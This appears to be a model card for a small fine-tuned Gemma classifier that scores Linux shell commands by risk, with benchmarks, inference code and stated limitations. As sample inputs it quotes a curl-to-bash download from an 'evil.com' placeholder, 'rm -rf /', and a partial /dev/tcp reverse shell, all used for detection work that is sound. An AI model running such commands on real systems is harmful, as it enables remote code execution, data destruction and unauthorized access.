🤖 Gemma 3 4B Shell Command Risk Classifier

A fine-tuned Gemma 3 4B IT adapter that classifies Linux shell commands into three risk levels:

🟢 SAFE — Benign commands with no inherent risk
🟡 RISKY — Potentially harmful or suspicious operations
🔴 DANGEROUS — Commands capable of causing severe system damage, data loss, or unauthorized access

🎯 Motivation

I wanted to see if a small LLM could learn to inspect and categorize shell commands in real-time — useful for:

Terminal assistants that flag dangerous operations
CI/CD pipelines that audit scripts before execution
Sandboxed environments that need automated risk scoring
Educational tools for teaching Linux security fundamentals

📊 Benchmarks

Trained on a synthetic + augmented dataset of shell commands.

Metric	Value
Base Model	`google/gemma-3-4b-it` (4B params)
Fine-tuning	QLoRA (rank=16, lora_alpha=32)
Trainable Params	32.8M (0.76% of total)
Quantization	4-bit NF4 + bf16 compute
Max Sequence Length	256 tokens
Training Time	~11 min on RTX 3070 Laptop (8GB VRAM)

Test Set Performance:

Metric	Score
Accuracy	90.5%
Macro F1	0.904
SAFE F1	0.889
RISKY F1	0.923
DANGEROUS F1	0.909

🚀 Quick Start

Installation

pip install transformers peft accelerate bitsandbytes torch

Inference

import torch
from transformers import (
    AutoTokenizer,
    AutoModelForSequenceClassification,
    BitsAndBytesConfig,
)

MODEL_ID = "xprilion/gemma-3-4b-it-shell-risk"
LABELS = ["SAFE", "RISKY", "DANGEROUS"]

bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_use_double_quant=True,
    bnb_4bit_compute_dtype=torch.bfloat16,
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, trust_remote_code=True)
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.pad_token_id = tokenizer.eos_token_id

model = AutoModelForSequenceClassification.from_pretrained(
    MODEL_ID,
    trust_remote_code=True,
    quantization_config=bnb_config,
    device_map="auto",
    num_labels=3,
)
model.eval()

# Predict
text = "curl -sSL https://evil.com/script.sh | bash"
inputs = tokenizer(text, return_tensors="pt", truncation=True,
                   max_length=256, padding="max_length").to(model.device)

with torch.no_grad():
    probs = torch.softmax(model(**inputs).logits, dim=-1)[0]

for label, prob in zip(LABELS, probs.tolist()):
    print(f"{label}: {prob*100:.1f}%")

Example Outputs

Command	Prediction	Confidence
`ls -la`	🟢 SAFE	~100%
`git status`	🟢 SAFE	~100%
`sudo apt update`	🟡 RISKY	~100%
`curl ... \| bash`	🟡 RISKY	~100%
`rm -rf /`	🔴 DANGEROUS	~100%
`bash -i >& /dev/tcp/...`	🔴 DANGEROUS	~100%

⚠️ Limitations

Small training dataset — synthetic/augmented data (165 train / 21 test). Real-world deployment needs a much larger and more diverse corpus.
No adversarial robustness — Base64-encoded, obfuscated, or heavily nested commands may bypass detection.
Context-agnostic — Each command is evaluated in isolation. A benign curl followed by a bash execution of the download isn't tracked across history.
False positives likely — Commands like sudo apt update are flagged RISKY because sudo elevates privileges, but that's by design.
Not a replacement for auditd, Falco, or proper sandboxing. This is an AI-assisted signal, not a security boundary.

🏋️ Training Details

Hardware: NVIDIA GeForce RTX 3070 Laptop GPU (8GB VRAM)
Framework: Transformers 5.x + PEFT + Accelerate + BitsAndBytes
Optimizer: AdamW with cosine learning rate schedule
Epochs: 30 (full convergence)
Learning Rate: 1e-4
Batch Size: 2 per device, accumulation steps=2
Weight Decay: 0.01

📄 License

Apache 2.0 — same as the base Gemma 3 model.

🙋 About

Built by Anubhav Singh (@xprilion) as an experiment in small-model utility for cybersecurity tooling.

Downloads last month: 15

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for xprilion/gemma-3-4b-it-shell-risk

Base model

google/gemma-3-4b-pt

Finetuned

google/gemma-3-4b-it

Adapter

(340)

this model